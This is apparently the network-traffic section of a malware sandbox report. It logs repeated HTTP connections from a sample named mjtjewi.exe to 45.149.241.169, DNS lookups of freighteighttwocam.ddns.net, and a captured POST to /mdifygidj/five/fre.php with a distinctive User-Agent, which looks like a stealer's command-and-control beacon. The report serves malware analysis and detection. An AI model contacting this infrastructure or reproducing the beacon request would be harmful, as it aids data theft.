Oct 3, 2024 09:22:22.212795019 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.215054035 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.220110893 CEST	80	64425	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.220180988 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.225085020 CEST	80	64425	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.910722017 CEST	80	64425	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.910773039 CEST	80	64425	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:22.910892010 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:22.999142885 CEST	64425	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.004091024 CEST	80	64425	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.254395008 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.259706020 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.259807110 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.364090919 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.369240999 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.369318008 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.374342918 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.931077957 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.931318045 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.931463957 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:23.931566954 CEST	64426	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:23.936121941 CEST	80	64426	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.093225002 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.098130941 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.098208904 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.101181030 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.105935097 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.106030941 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.110836983 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.748373032 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.748404026 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.748652935 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.749772072 CEST	64427	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.754606009 CEST	80	64427	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.897533894 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.902664900 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.902770996 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.905708075 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.910557032 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:24.910666943 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:24.915587902 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.638870001 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.638891935 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.639024019 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.639116049 CEST	64428	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.644790888 CEST	80	64428	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.800235033 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.805989981 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.806111097 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.810230017 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.815943003 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:25.816015959 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:25.821641922 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.473027945 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.473089933 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.473248005 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.479259968 CEST	64429	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.484271049 CEST	80	64429	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.646806002 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.651676893 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.651757002 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.654994965 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.659781933 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:26.659849882 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:26.664727926 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.331634998 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.331707001 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.331888914 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.331939936 CEST	64430	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.336837053 CEST	80	64430	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.491563082 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.496582985 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.496674061 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.499201059 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.504056931 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:27.504132032 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:27.509526014 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.156263113 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.156297922 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.156424046 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.156507015 CEST	64431	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.161528111 CEST	80	64431	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.295455933 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.300467968 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.303821087 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.306813955 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.311655045 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:28.311778069 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:28.316627026 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.195664883 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.195754051 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.195837021 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.292330980 CEST	64432	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.297416925 CEST	80	64432	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.625860929 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.630826950 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.630925894 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.634440899 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.639374971 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:29.639445066 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:29.646051884 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.480031967 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.480233908 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.480474949 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.480524063 CEST	64433	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.485332012 CEST	80	64433	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.632863045 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.637936115 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.638108015 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.641104937 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.645963907 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:30.646051884 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:30.650814056 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.486274004 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.486406088 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.486447096 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.486486912 CEST	64434	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.491240978 CEST	80	64434	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.658930063 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.664025068 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.664165020 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.669754982 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.674626112 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:31.674681902 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:31.679503918 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.303347111 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.303451061 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.303507090 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.306659937 CEST	64435	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.311822891 CEST	80	64435	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.490616083 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.495699883 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.495773077 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.497924089 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.502873898 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:32.502916098 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:32.507778883 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.187992096 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.188153982 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.188157082 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.188196898 CEST	64436	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.193006039 CEST	80	64436	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.325853109 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.332051992 CEST	80	64437	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.332197905 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.334327936 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.340368986 CEST	80	64437	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:33.340490103 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:33.346483946 CEST	80	64437	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:34.292666912 CEST	80	64437	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:34.292855024 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.298011065 CEST	80	64437	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:34.298105001 CEST	64437	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.435754061 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.440736055 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:34.440934896 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.443031073 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.448096037 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:34.448158026 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:34.453089952 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.079196930 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.079221010 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.079411030 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.079411983 CEST	64438	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.085141897 CEST	80	64438	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.212918997 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.217974901 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.218071938 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.220199108 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.224936962 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.225001097 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.229795933 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.848511934 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.848560095 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:35.848696947 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.848786116 CEST	64439	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:35.853533983 CEST	80	64439	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.000144958 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.005745888 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.005851030 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.009468079 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.015407085 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.015475988 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.020795107 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.750042915 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.750072002 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.750157118 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.750319004 CEST	64440	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.755142927 CEST	80	64440	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.904503107 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.909526110 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.909642935 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.912101984 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.917062998 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:36.917140007 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:36.922022104 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.777426004 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.777475119 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.777548075 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.777548075 CEST	64441	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.782566071 CEST	80	64441	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.919142008 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.924076080 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.924159050 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.926255941 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.931313992 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:37.931400061 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:37.936233044 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.687633038 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.687695980 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.687921047 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.687921047 CEST	64442	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.692949057 CEST	80	64442	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.824619055 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.829576015 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.829663992 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.831857920 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.836646080 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:38.836711884 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:38.841528893 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.523708105 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.523859024 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.524137974 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.524243116 CEST	64443	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.530057907 CEST	80	64443	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.669563055 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.674635887 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.674762011 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.676918030 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.681864977 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:39.681925058 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:39.686739922 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.350311041 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.350358963 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.350488901 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.350533009 CEST	64444	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.355345011 CEST	80	64444	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.598413944 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.603490114 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.603915930 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.609555960 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.614600897 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:40.614660025 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:40.619858980 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.352128983 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.352351904 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.352525949 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.352597952 CEST	64445	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.357295036 CEST	80	64445	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.543690920 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.549698114 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.549899101 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.552056074 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.558101892 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:41.558182955 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:41.564050913 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.187657118 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.187695980 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.187829971 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.187880039 CEST	64446	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.192689896 CEST	80	64446	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.331733942 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.336947918 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.337194920 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.339214087 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.344338894 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:42.344415903 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:42.349287987 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.088213921 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.088359118 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.088517904 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.088592052 CEST	64447	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.095305920 CEST	80	64447	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.237551928 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.242518902 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.243807077 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.246021032 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.251410961 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.251789093 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.256630898 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.910703897 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.910820007 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:43.911035061 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.911103010 CEST	64448	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:43.915997982 CEST	80	64448	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.055253029 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.060436010 CEST	80	64449	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.060545921 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.062635899 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.067401886 CEST	80	64449	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.067473888 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.072300911 CEST	80	64449	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.839922905 CEST	80	64449	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.840137959 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.840225935 CEST	80	64449	45.149.241.169	192.168.2.11
Oct 3, 2024 09:22:44.840279102 CEST	64449	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:22:44.845007896 CEST	80	64449	45.149.241.169	192.168.2.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:40.500483990 CEST	55019	53	192.168.2.11	1.1.1.1
Oct 3, 2024 09:20:40.665950060 CEST	53	55019	1.1.1.1	192.168.2.11
Oct 3, 2024 09:20:48.098545074 CEST	59057	53	192.168.2.11	1.1.1.1
Oct 3, 2024 09:20:48.111200094 CEST	53	59057	1.1.1.1	192.168.2.11
Oct 3, 2024 09:20:57.588593006 CEST	53	53442	1.1.1.1	192.168.2.11
Oct 3, 2024 09:20:59.065795898 CEST	53	49505	1.1.1.1	192.168.2.11
Oct 3, 2024 09:21:47.463262081 CEST	49886	53	192.168.2.11	1.1.1.1
Oct 3, 2024 09:21:47.474385977 CEST	53	49886	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:40.500483990 CEST	192.168.2.11	1.1.1.1	0x381	Standard query (0)	www.sodiumlaurethsulfatedesyroyer.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:48.098545074 CEST	192.168.2.11	1.1.1.1	0x2040	Standard query (0)	freighteighttwocam.ddns.net	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:21:47.463262081 CEST	192.168.2.11	1.1.1.1	0xa4ac	Standard query (0)	freighteighttwocam.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:40.665950060 CEST	1.1.1.1	192.168.2.11	0x381	No error (0)	www.sodiumlaurethsulfatedesyroyer.com	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:40.665950060 CEST	1.1.1.1	192.168.2.11	0x381	No error (0)	www.sodiumlaurethsulfatedesyroyer.com	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:20:48.111200094 CEST	1.1.1.1	192.168.2.11	0x2040	No error (0)	freighteighttwocam.ddns.net	45.149.241.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:21:47.474385977 CEST	1.1.1.1	192.168.2.11	0xa4ac	No error (0)	freighteighttwocam.ddns.net	45.149.241.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.sodiumlaurethsulfatedesyroyer.com

freighteighttwocam.ddns.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49711	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:48.126672029 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 176 Connection: close
